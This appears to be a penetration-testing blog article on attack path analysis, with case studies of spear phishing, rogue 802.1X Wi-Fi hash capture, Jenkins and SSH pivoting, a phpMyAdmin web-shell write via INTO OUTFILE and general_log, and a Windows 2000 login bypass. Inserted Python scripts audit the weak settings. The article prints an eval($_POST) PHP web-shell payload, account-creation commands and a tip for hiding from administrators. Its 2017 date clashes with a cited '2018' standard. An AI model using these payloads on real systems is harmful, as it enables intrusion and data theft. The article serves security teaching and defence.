Attack Path Analysis
11/11/2017
Attack path is not a new concept, but at present academia defines it in two ways. The first is that the attack path consists of all the asset nodes an attacker passes through in the whole process of penetration testing an information system. In the other view, the attack path is the set of all attack methods an attacker uses while attacking a single asset. As a technician, I side with the latter.
Why should we comb the attack paths?
As early as 2018, the first edition of PTES (Penetration Testing Execution Standard) showed that attack path analysis is indispensable in penetration testing. The following are the main stages defined by the standard as the basis for penetration testing execution:
The description of the vulnerability analysis stage is as follows:
You need to consider how to obtain access to the target system. At the vulnerability analysis stage, you should synthesize the information gained in the previous stages and analyze which attack paths are feasible.
Simply put, we identify vulnerabilities in the target system by collecting information, and then comb the attack paths. The method is to select an appropriate scenario and plan the overall attack path. I list a few applicable intranet and extranet attack paths for some attack scenarios below (for reference only):
In the process of penetration testing, we must be prepared to follow a "winding path", because things probably won't go as smoothly as expected. To ensure a thorough understanding of the target system, the first thing to do is identify the target and scope of the attack through the preceding intelligence gathering. Then draw the attack paths based on the vulnerability analysis of the target system. It is better to attack the target system only when you are almost sure the particular attack will succeed. I will analyze a few specific cases in some attack scenarios; the methods of intelligence gathering and threat modeling need not be detailed here.
Spear phishing is one of the common attack methods used by hackers; it often sends targeted e-mails that trick recipients into clicking on unsafe links or attachments.
Case Description
Jerry is a hacker employed by Company A as a social-engineering assessor whose task is to try to break into Company A's servers. The company has some patented processes and a list of suppliers that its rivals want to obtain. However, the chief executive told Jerry that it was almost impossible to break into his company's servers, because he guards the secret materials with his life.
Through previous intelligence gathering, Jerry found Company A's server location, IP address, e-mail addresses, telephone number, physical address, e-mail server, employee names and more. He also learned that the CEO has a family member with cancer, so Jerry began to focus on cancer research and fund-raising and got actively involved in it. Meanwhile, it was quite simple for Jerry to get other personal information about the CEO, such as his favorite restaurant and football team.
After gathering these materials, Jerry called the CEO and pretended to be a fundraiser for a cancer charity that the CEO had supported before. He told the CEO that the charity would hold a lottery draw, and that in addition to coupons for several restaurants (including his favorite restaurant), the prizes for donors included two tickets for a football match (including his favorite team).
As expected, the CEO agreed to have Jerry send him a PDF document with more information about the event. Jerry even managed to persuade the CEO to use a specific version of Adobe Reader on his computer, telling him, "I want to make sure you can open the PDF file." Soon after the PDF was sent, the CEO opened the file and a malicious Trojan horse was installed on his computer, which allowed Jerry to break into it.
Case Analysis
This case fits the spear phishing scenario because the target is a specific individual or group, and the target host is in a closed network. Since the attack is aimed at a specific individual or group, the attacker will typically spend time in the early stage gathering employee names and titles, e-mail addresses, telephone numbers, server IP addresses, physical addresses, the mail server and other information. In order to trick the recipient into clicking on links carrying a malicious Trojan horse, the attacker needs to gain the target's trust by impersonating someone. When the recipient clicks the malicious link on his computer, he runs a Trojan horse program which allows the attacker to break into his host.
For wireless network attacks, the most frequently used method is to build a phishing (rogue) Wi-Fi. Once the targeted device automatically connects to it, the attacker can intercept the communication and steal sensitive data. An enterprise network may be intruded upon in this way when it provides public Wi-Fi for employees' daily use, after which the attacker could steal confidential data.
Case Description
The security tester found two wireless networks near the target company. One was a public Wi-Fi based on portal (captive-portal) authentication; the other was an 802.1x network. After connecting to the public Wi-Fi, the tester was redirected to the portal authentication page.
Soon a common vulnerability was detected: user names of this portal system could be enumerated from the information returned by the login page. The tester used Burp Suite to brute-force the user names, and then logged into the portal after brute-forcing those users' passwords. However, it turned out that this network was isolated from the company's office network. Since the purpose of the penetration test was to break into the intranet, this network could not be the target, so the tester turned to the other wireless network, which used 802.1x authentication.
When companies deploy an 802.1x wireless network, the PEAP-MSCHAPv2 architecture is generally adopted in consideration of compatibility and the convenience of using domain accounts. The authentication process of PEAP is divided into two stages as follows:
At present, the main problem with PEAP lies in the client's validation of the server certificate. Such validation provides transport-layer security for the authentication through an SSL-like mechanism, but it requires companies to purchase certificates from a CA, or to build their own PKI and sign certificates for the wireless network, and then to deploy the root certificate to every client. Most companies choose to sign a certificate themselves, and because deploying the root certificate to each client is so complicated, they tend to abandon that step entirely.
The attack method is to trick users into connecting to a rogue Wi-Fi set up by the tester, capture the hash of the account transmitted during the second-stage MSCHAPv2 authentication, and then brute-force the password with a dictionary. Here the tester used hostapd-wpe to build an 802.1x Wi-Fi, and eight hash values were obtained within moments. He successfully recovered two login passwords with a brute-force program, which runs through password guesses at high speed until it finds a match.
From the previous reconnaissance he found that the company had adopted the PEAP-MSCHAPv2 architecture, since the two login accounts were also domain accounts that could log into the office automation system. Moreover, a Jenkins program was found in the intranet. Jenkins is a Java-based continuous integration tool for monitoring continuously repeated jobs. When Jenkins is configured improperly, there is an unauthenticated command execution vulnerability, but the administrator had restricted it. Therefore, the tester needed to get an account that could execute commands.
Accessing the management page of Jenkins, the tester obtained the list of users without logging in, due to insecure configuration. After collecting all the user names, three passwords were obtained by brute force. The tester logged into Jenkins with one of the three accounts and accessed the script console page (of the form "xxxx.com/script"). Although the account could execute commands, it had very low privileges, so a reverse shell was sent back to the tester's own server for privilege escalation. Because the "wget" command could not be used in that environment, the reverse-shell script was written onto the server using Groovy syntax. Next, the tester obtained root by exploiting a local privilege escalation vulnerability in the Linux kernel.
The next step was to collect sensitive files such as configuration files, shell history and shadow. After cracking the password hashes from shadow, he used Hydra, the brute-force tool, to log into intranet hosts over SSH. A private key file was found after logging into one server successfully, and through it he accessed another server and discovered a Zabbix program. Once the Zabbix server address was found in a configuration file, the task became finding the account password for Zabbix. Using information collected from history files found on several other servers, the tester brute-forced the Zabbix account password and finally got into Zabbix. In this way, the tester successfully intruded into the company's intranet.
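The weak point in the PEAP-MSCHAPv2 case above is a supplicant that never checks the RADIUS server's certificate, which is exactly what lets a rogue hostapd-wpe access point collect challenge/response hashes. The following is an added example, not code from the original article: it lints wpa_supplicant-style network blocks (the configuration text is constructed) and reports PEAP networks that lack server-certificate validation.

```python
"""Audit wpa_supplicant network={...} blocks for PEAP settings that leave the
client unable to tell a rogue 802.1X access point from the real one.
Added example, not from the original article; SAMPLE_CONF is constructed."""
import re

# Constructed sample: the same SSID once without and once with validation.
SAMPLE_CONF = """
network={
    ssid="Corp-WiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="Corp-WiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    ca_cert="/etc/ssl/certs/corp-root.pem"
    domain_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
"""

def parse_networks(conf: str) -> list:
    """Split the config into network={...} blocks and return key/value dicts."""
    nets = []
    for body in re.findall(r"network=\{(.*?)\}", conf, re.S):
        kv = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)   # phase2="auth=MSCHAPV2" keeps its '='
            kv[key.strip()] = value.strip().strip('"')
        nets.append(kv)
    return nets

def audit_peap(net: dict) -> list:
    """Return findings for one network block; an empty list means it passes."""
    findings = []
    if net.get("eap", "").upper() != "PEAP":
        return findings
    if "ca_cert" not in net:
        findings.append("no ca_cert: the server certificate is not validated at all")
    if not any(k in net for k in ("domain_match", "domain_suffix_match", "altsubject_match")):
        findings.append("no domain_match/domain_suffix_match/altsubject_match: "
                        "any certificate chaining to the CA is accepted")
    return findings

def audit_conf(conf: str) -> list:
    """Pair each network's SSID with its findings."""
    return [(n.get("ssid"), audit_peap(n)) for n in parse_networks(conf)]

if __name__ == "__main__":
    for ssid, findings in audit_conf(SAMPLE_CONF):
        print(ssid, "->", findings or "OK")
```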
Case Analysis
This case is a typical wireless intrusion scenario among network-layer attack scenarios. First, the attacker discovered that the company had opened a public wireless network. Then a rogue Wi-Fi was used to obtain employees' login accounts, which were used to get onto the company's Wi-Fi. Finally, relying on that foothold, the attacker broke into the intranet systems.
phpMyAdmin is a popular web-based MySQL management tool. If the password set for it is too simple, an attacker could log into it and go on to compromise the host.
Case Description
During penetration testing, we may sometimes meet web environments built with phpStudy. If phpMyAdmin has a weak password, we can get root privileges in the MySQL database and write a web shell by executing database statements. Here is an experiment I have done.
phpStudy is an application integration package for PHP debugging environments. It integrates MySQL, Apache and other components, including the MySQL management tool phpMyAdmin. Here is a little trick: in the root directory of a PHP website there is always an l.php probe, and when you encounter such a probe it contains all kinds of server and website information. The PHP probe looks like this:
In the phpStudy environment, the default credentials for phpMyAdmin are root/root. We use this weak password to log into phpMyAdmin.
Seeing this, you may think of writing the shell with the INTO OUTFILE statement.
select '<?php @eval($_POST["hihack"]);?>' into outfile 'C:\phpStudy\PHPTutorial\WWW\hacker.php'
But what if this happens?
This error means that the MySQL server is running with the --secure-file-priv option. The MySQL documentation explains that this option (--secure-file-priv=name: limit LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE() to files within the specified directory) restricts file import and export to the specified directory, so this statement cannot be executed.
Is it impossible to deal with this problem?
It really isn't. There is another option that can help us write a web shell through the MySQL database: general_log. Once MySQL enables this option, every query can be read in the general_log file. This log is disabled by default because the file generally grows very large, but sometimes it is necessary to turn general_log on for debugging. In other words, the general log records all queries and stores them verbatim. If general_log is enabled and general_log_file is set to a PHP file, every query executed in MySQL will be written into that file.
set global general_log='on';
set global general_log_file='C:\phpStudy\PHPTutorial\WWW\hacker.php';
select '<?php @eval($_POST["hihack"]);?>';
As long as we enable the general_log option, we can point its file at any physical path and then execute MySQL statements at will. These statements will be recorded in the general_log file, so we can write a web shell into that file.
Finally, you can use the web shell by connecting to the specified file "hacker.php" with a web shell management tool.
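From the defender's side, the two server settings this path depends on (an empty secure_file_priv and a general_log_file redirected into the web root) are visible in SHOW GLOBAL VARIABLES, and the statements it issues are themselves recorded in the general log. The following is an added example, not code from the original article: it audits a constructed variable snapshot and flags the suspicious statements in a constructed general-log excerpt; WEB_ROOTS is an assumed list of document roots.

```python
"""Audit MySQL server variables for the settings the phpMyAdmin web-shell path
relies on, and scan general-log lines for the statements that path issues.
Added example, not from the original article; SAMPLE_VARS and SAMPLE_LOG are
constructed, and WEB_ROOTS is an assumed list of document roots."""
from pathlib import PureWindowsPath, PurePosixPath

WEB_ROOTS = [r"C:\phpStudy\PHPTutorial\WWW", "/var/www/html"]  # assumed roots

# Constructed snapshot in the shape of `SHOW GLOBAL VARIABLES` name/value rows.
SAMPLE_VARS = {
    "secure_file_priv": "",      # "" = unrestricted; NULL (None) disables file I/O
    "general_log": "ON",
    "general_log_file": r"C:\phpStudy\PHPTutorial\WWW\hacker.php",
    "log_output": "FILE",
}

# Constructed general-log excerpt in the MySQL 5.7 text format.
SAMPLE_LOG = r"""2017-11-11T10:00:01.000000Z    12 Query     SHOW DATABASES
2017-11-11T10:00:05.000000Z    12 Query     set global general_log_file='C:\phpStudy\PHPTutorial\WWW\hacker.php'
2017-11-11T10:00:09.000000Z    12 Query     select '<?php @eval($_POST["hihack"]);?>'
"""

def _under(path: str, root: str) -> bool:
    """True if path lies under root; the root decides Windows vs POSIX semantics."""
    cls = PureWindowsPath if ("\\" in root or ":" in root) else PurePosixPath
    try:
        cls(path).relative_to(cls(root))
        return True
    except ValueError:
        return False

def audit_mysql(variables: dict) -> list:
    """Return findings; an empty list means neither weakness is present."""
    findings = []
    if variables.get("secure_file_priv") == "":
        findings.append("secure_file_priv is empty: INTO OUTFILE/LOAD_FILE may use any path")
    log_on = variables.get("general_log", "OFF").upper() == "ON"
    to_file = "FILE" in variables.get("log_output", "FILE").upper()
    if log_on and to_file:
        logf = variables.get("general_log_file", "")
        if any(_under(logf, root) for root in WEB_ROOTS):
            findings.append("general_log_file is inside a web root: " + logf)
        if logf.lower().endswith((".php", ".phtml", ".jsp", ".asp", ".aspx")):
            findings.append("general_log_file has a server-executable extension: " + logf)
    return findings

def suspicious_queries(log_text: str) -> list:
    """Flag logged statements that carry PHP tags or retarget the log or an outfile."""
    markers = ("<?php", "<?=", "general_log_file", "into outfile", "into dumpfile")
    return [line for line in log_text.splitlines()
            if any(m in line.lower() for m in markers)]

if __name__ == "__main__":
    for f in audit_mysql(SAMPLE_VARS):
        print("FINDING:", f)
    for q in suspicious_queries(SAMPLE_LOG):
        print("SUSPICIOUS:", q)
```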
Case Analysis
Many companies and individuals like to use phpMyAdmin to manage MySQL databases; searching for the keyword "phpMyAdmin" in ZoomEye returns an amazing number of results, ranking second in China. phpMyAdmin is very powerful and convenient thanks to its friendly visual interface, its ability to execute commands, and database import and export. It can be said that phpMyAdmin can fully manipulate the MySQL database. However, if the root password is too simple and the MySQL configuration is leaked, 99% of attackers could get a web shell or even server privileges by technical means. phpMyAdmin is widely used in popular stacks such as phpStudy, PHPnow, WAMP, LAMP and XAMPP, whose default password is root, hence they are easy to intrude if the password is not changed.
Most applications that provide remote access have no internal security policies, nor do they provide independent security authentication mechanisms. Therefore there is no doubt that remote access to internal network resources increases the vulnerability of a company's intranet, and a common way to exploit it is remote node intrusion. The remote node access mode refers to a computer connecting to a remote access server, which can be reached by RDP, Telnet or SSH. Here is a case of intruding into port 3389 of a Windows 2000 system (this case is quoted from the Internet).
Case Description
Port 3389 is the port of the Windows 2000 Server Remote Desktop Protocol. The approach in this case exploits a classic input method vulnerability that exists in all Chinese versions of Microsoft Windows 2000. This vulnerability is not new, but it is a classic.
The first step is to use a port scanning tool to detect the operating system versions and open ports of the hosts in the current network segment (intranet). Second, assuming we detect a host with the 3389 vulnerability, we connect to port 3389 remotely and see the familiar Windows 2000 login screen. The third step is to exploit the input method vulnerability to create a user and add it to the administrators group, or to activate the guest user. I suggest activating the guest user because it is not easily noticed by the administrator. The specific steps are as follows:
1) Use Ctrl+Shift to switch the input method to Full Pinyin; the input method status bar then appears in the lower left corner of the login screen (if it does not appear, wait a while). Right-click the Microsoft icon on the status bar to pop up the "Help" menu (if "Help" is gray at this point, you can give up, because the vulnerability has probably been fixed).
2) Open the "Operation Guide" in the "Help" menu and right-click on the top toolbar; a window named "Jump to URL" pops up. It shows the current URL and a blank field, which we fill with the Windows 2000 system installation path. For example, if the system is installed on drive D, fill in "d:\winnt\system32" as shown in the picture below and click "OK".
The link will appear in the right window as shown in the picture. Clicking the link "File display", we successfully bypass authentication and enter the system's "system32" directory.
3) Now we need an account to become a legitimate user of the system. First find "net.exe" in the "system32" directory and create a shortcut for it, then right-click the shortcut and, under "Properties -> Target", append "user guest /active:yes" after "d:\winnt\system32\net.exe" separated by a space, and finally click "OK". The purpose of this step is to activate the disabled guest account through "net.exe"; the form "user username password /add" is also recognized. Here you can create a user named WINADMIN: find the NET file and right-click "Create shortcut -> Properties -> add the user".
4) In the figure above, we have added a user named "WINADMIN"; then change its password with the command "net user winadmin xxxx", where "xxxx" is the password you want to set. There may be no response after executing the command, but the user has actually been added. Of course the permissions of an ordinary user are not enough; we need to add the user to the administrators group for privilege escalation.
Now we have access to the target host.
5) Go into the Registry, modify or create a DWORD value named "DontDisplayLastUserName" under the "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" key and set its data to "1". This value means that the next time someone logs on to the computer, the last logged-in user will no longer be shown on the logon screen, so the administrator won't notice you. Yeah!
Case Analysis
Many people will say it is just the input method vulnerability that almost everyone knows. However, hosts that open port 3389 do not necessarily have the input method vulnerability; Remote Desktop Protocol is just a normal Windows service. But on a system that has not been patched and has port 3389 open, the input method vulnerability can be used to create users or activate the guest user. This vulnerability turns the Terminal Services of Windows 2000 into a "legal" Trojan horse. Nowadays this vulnerability is rarely seen.
Let's get back to the question: why should we comb the attack paths?
This article simply analyzes several attack paths, hoping that besides discussing attack ideas from the perspective of the red side (attackers), it can also provide some defensive ideas for the blue side (network security personnel). Nowadays, many enterprises misunderstand the security construction of information systems: they often stop at the stage of external penetration testing and ignore the internal security of their information systems. Combing and analyzing attack paths not only shows its value in red-blue confrontation, but also provides an excellent model to support the internal and external security construction of the whole enterprise information system. I have not been through the construction of an information system from start to finish, but it is easy to imagine that performance is the main goal, so security is not the second or even the third most important factor in the process of building an information system. But if we do not consider the security factor at the beginning, the future maintenance and security investment in the information system are bound to be enormous.
Therefore, the combing and analysis of attack paths can be made a routine practice. Meanwhile, the lessons learned from penetration testing and incident response can be continuously enriched. These can help us find and fix the vulnerabilities of information systems in time.